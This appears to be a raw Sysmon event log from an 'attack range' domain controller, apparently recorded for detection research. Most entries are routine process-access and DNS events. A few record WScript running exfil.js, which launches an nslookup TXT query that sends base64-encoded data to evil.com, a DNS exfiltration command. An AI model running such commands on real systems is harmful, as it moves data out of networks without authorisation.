10341000x8000000000000000195738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.417{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-683E-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.417{2E1864BB-17AC-629A-663E-000000005F02}79122404C:\Windows\system32\cmd.exe{2E1864BB-17AC-629A-683E-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.423{2E1864BB-17AC-629A-683E-000000005F02}5124C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AC-629A-663E-000000005F02}7912C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlktbhzp.tmp 2>&1 10341000x8000000000000000195735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.368{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-673E-000000005F02}7212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.368{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-673E-000000005F02}7212C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.352{2E1864BB-17AC-629A-673E-000000005F02}72127744C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-663E-000000005F02}7912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.321{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-673E-000000005F02}7212C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.321{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.321{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.321{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.321{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.321{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-663E-000000005F02}7912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.321{2E1864BB-17A1-629A-783D-000000005F02}55524808C:\Windows\System32\WScript.exe{2E1864BB-17AC-629A-663E-000000005F02}7912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.324{2E1864BB-17AC-629A-663E-000000005F02}7912C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlktbhzp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.310{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlefvjq.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000195723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.810{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52254- 354300x8000000000000000195722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.810{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52253- 354300x8000000000000000195721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.809{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52252- 354300x8000000000000000195720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.809{00000000-0000-0000-0000-000000000000}732<unknown process>-udptruefalse127.0.0.1-52252-false127.0.0.1-53domain 354300x8000000000000000195719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.718{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52251- 354300x8000000000000000195718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.717{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52250- 354300x8000000000000000195717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.717{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52249- 354300x8000000000000000195716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.717{00000000-0000-0000-0000-000000000000}5200<unknown process>-udptruefalse127.0.0.1-52249-false127.0.0.1-53domain 354300x8000000000000000195715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.330{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52248- 354300x8000000000000000195714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.330{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52247- 354300x8000000000000000195713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.328{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52246- 354300x8000000000000000195712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.328{00000000-0000-0000-0000-000000000000}7616<unknown process>-udptruefalse127.0.0.1-52246-false127.0.0.1-53domain 354300x8000000000000000195711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52245- 354300x8000000000000000195710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52244- 354300x8000000000000000195709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.198{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52243- 354300x8000000000000000195708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.198{00000000-0000-0000-0000-000000000000}5824<unknown process>-udptruefalse127.0.0.1-52243-false127.0.0.1-53domain 354300x8000000000000000195707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.073{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52242- 354300x8000000000000000195706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.072{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52241- 354300x8000000000000000195705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.072{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52240- 354300x8000000000000000195704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.071{00000000-0000-0000-0000-000000000000}5128<unknown process>-udptruefalse127.0.0.1-52240-false127.0.0.1-53domain 354300x8000000000000000195703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.972{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52239- 354300x8000000000000000195702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.971{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52238- 354300x8000000000000000195701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.971{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52237- 354300x8000000000000000195700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.971{00000000-0000-0000-0000-000000000000}8028<unknown process>-udptruefalse127.0.0.1-52237-false127.0.0.1-53domain 354300x8000000000000000195699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.864{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52236- 354300x8000000000000000195698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.864{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52235- 354300x8000000000000000195697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.864{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52234- 354300x8000000000000000195696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.864{00000000-0000-0000-0000-000000000000}6560<unknown process>-udptruefalse127.0.0.1-52234-false127.0.0.1-53domain 354300x8000000000000000195695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.750{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52233- 354300x8000000000000000195694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.750{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52232- 354300x8000000000000000195693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.750{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52231- 354300x8000000000000000195692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.749{00000000-0000-0000-0000-000000000000}7260<unknown process>-udptruefalse127.0.0.1-52231-false127.0.0.1-53domain 354300x8000000000000000195691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.656{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52230- 354300x8000000000000000195690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.656{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52229- 354300x8000000000000000195689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.655{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52228- 354300x8000000000000000195688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.655{00000000-0000-0000-0000-000000000000}7832<unknown process>-udptruefalse127.0.0.1-52228-false127.0.0.1-53domain 10341000x8000000000000000195687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.245{2E1864BB-17AC-629A-643E-000000005F02}70242568C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-653E-000000005F02}7712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.229{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.229{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.229{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.229{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 